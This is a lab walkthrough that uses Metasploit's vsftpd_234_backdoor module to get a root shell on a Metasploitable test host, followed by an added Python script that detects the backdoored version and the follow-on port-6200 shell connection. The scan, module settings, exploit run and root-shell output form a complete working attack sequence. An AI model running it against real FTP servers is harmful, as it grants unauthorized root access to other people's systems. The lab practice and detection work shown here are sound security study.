Metasploitable Port 21/tcp - vsftpd

Start with a more complete scan:


msf > nmap -sV  10.13.37.136 -p 21
[*] exec: nmap -sV  10.13.37.136 -p 21


Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-12 10:34 EST
Nmap scan report for 10.13.37.136
Host is up (0.0018s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix

Next, search for a relevant exploit module:

msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

Oh good! It found something, so let's configure it to use exploit/unix/ftp/vsftpd_234_backdoor:

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) >

Set the remote (target) address and port, and the local listener (receiver) host IP. Note that msfconsole's set command takes no "=" between the option name and its value:

msf exploit(vsftpd_234_backdoor) > set RHOST 10.13.37.136
RHOST => 10.13.37.136
msf exploit(vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf exploit(vsftpd_234_backdoor) > set LHOST 10.13.37.116
LHOST => 10.13.37.116

Search for an appropriate payload. Note: this is done from bash, not from inside msfconsole.

$ msfpayload -l | grep unix
    ...
    ...
    cmd/unix/interact
    ...
    ...

Set the payload as well (cmd/unix/interact, the one found above and shown in the settings review below):

msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
PAYLOAD => cmd/unix/interact

Review settings ...

msf exploit(vsftpd_234_backdoor) > set

Module: unix/ftp/vsftpd_234_backdoor
====================================

  Name                   Value
  ----                   -----
  ...
  LHOST                  10.13.37.116
  PAYLOAD                cmd/unix/interact
  RHOST                  10.13.37.136
  RPORT                  21
  ...

... And exploit!

msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (10.13.37.116:54285 -> 10.13.37.136:6200) at 2013-11-12 11:04:25 -0500

whoami
root
ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0c:29:e0:62:7f
          inet addr:10.13.37.136  Bcast:10.13.37.255  Mask:255.255.255.0
          ...

exit

[*] 10.13.37.136 - Command shell session 2 closed.  Reason: Died from EOFError

Hurray!
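From the defender's side, the two observable facts in the session above are the version string the service advertises (nmap's "vsftpd 2.3.4" line and the "220 (vsFTPd 2.3.4)" banner) and the second connection that appears once the backdoor fires (the shell session opened to 10.13.37.136:6200 a few seconds after the FTP login). The following is an added example, not code from the original page or from the Metasploit project, showing how a blue team might turn both into checks: a version check over nmap output or a raw banner, and a correlation over a connection log that flags a connection to port 6200 from a client that just spoke to port 21 on the same host. The connection-log line format and the five-minute correlation window are assumptions; the sample log lines are constructed, reusing the page's addresses and the source port from its session output.

```python
"""Defensive checks for the vsftpd 2.3.4 backdoor (added example, not from the page)."""
import re
from datetime import datetime, timedelta

# Version the page's nmap scan and FTP banner report for the backdoored build.
BACKDOORED_VERSION = "2.3.4"
# Port the page's session shows the spawned shell listening on.
BACKDOOR_SHELL_PORT = 6200
FTP_PORT = 21

# "21/tcp open  ftp     vsftpd 2.3.4"  (nmap -sV service line)
_NMAP_RE = re.compile(r"^\s*(\d+)/tcp\s+open\s+ftp\s+vsftpd\s+([\d.]+)", re.I)
# "220 (vsFTPd 2.3.4)"  (FTP greeting banner)
_BANNER_RE = re.compile(r"^220 \(vsFTPd ([\d.]+)\)", re.I)
# Assumed connection-log format: "<ISO timestamp> <src>:<sport> -> <dst>:<dport>"
_CONN_RE = re.compile(
    r"^(\S+)\s+(\d+\.\d+\.\d+\.\d+):(\d+)\s*->\s*(\d+\.\d+\.\d+\.\d+):(\d+)$"
)


def vsftpd_version(text):
    """Return the vsftpd version from an nmap service line or a 220 banner, else None."""
    for rx in (_NMAP_RE, _BANNER_RE):
        m = rx.search(text.strip())
        if m:
            return m.group(m.lastindex)  # last group is the version in both patterns
    return None


def is_backdoored(text):
    """True when the line or banner identifies the known-backdoored 2.3.4 release."""
    return vsftpd_version(text) == BACKDOORED_VERSION


def parse_conn(line):
    """Parse one connection-log line into a dict, or None if it does not match the assumed format."""
    m = _CONN_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m.group(1)),
        "src": m.group(2),
        "sport": int(m.group(3)),
        "dst": m.group(4),
        "dport": int(m.group(5)),
    }


def find_backdoor_sessions(lines, window_seconds=300):
    """Return (timestamp, src, dst) for every connection to the backdoor shell port
    where the same client reached the FTP control port on that host within the window.
    A lone connection to 6200 (no preceding FTP contact) is not reported."""
    conns = [c for c in map(parse_conn, lines) if c]
    conns.sort(key=lambda c: c["ts"])
    last_ftp = {}  # (src, dst) -> time of the most recent FTP control connection
    hits = []
    for c in conns:
        key = (c["src"], c["dst"])
        if c["dport"] == FTP_PORT:
            last_ftp[key] = c["ts"]
        elif c["dport"] == BACKDOOR_SHELL_PORT:
            seen = last_ftp.get(key)
            if seen is not None and c["ts"] - seen <= timedelta(seconds=window_seconds):
                hits.append((c["ts"].isoformat(), c["src"], c["dst"]))
    return hits


# Constructed sample log: the page's scan and session, plus two lines that must not trigger.
SAMPLE_CONN_LOG = [
    "2013-11-12T10:34:01 10.13.37.116:40000 -> 10.13.37.136:21",    # nmap scan: FTP alone, no hit
    "2013-11-12T09:10:00 10.13.37.120:51000 -> 10.13.37.136:6200",  # no preceding FTP: no hit
    "2013-11-12T11:04:20 10.13.37.116:48512 -> 10.13.37.136:21",    # FTP login that trips the backdoor
    "2013-11-12T11:04:25 10.13.37.116:54285 -> 10.13.37.136:6200",  # shell session from the page
]

if __name__ == "__main__":
    for probe in ("21/tcp open  ftp     vsftpd 2.3.4", "220 (vsFTPd 2.3.4)", "220 (vsFTPd 3.0.3)"):
        print(f"{probe!r:45} backdoored={is_backdoored(probe)}")
    for ts, src, dst in find_backdoor_sessions(SAMPLE_CONN_LOG):
        print(f"ALERT {ts}: {src} reached {dst}:{BACKDOOR_SHELL_PORT} shortly after FTP contact")
```

The version check is the cheap, high-confidence signal: any host still advertising 2.3.4 should be upgraded or taken offline, since the banner alone is what a scanner keys on. The connection correlation catches the moment of compromise rather than the exposure, so it belongs in flow or firewall logging where the 6200 listener, which has no business on an FTP server, stands out.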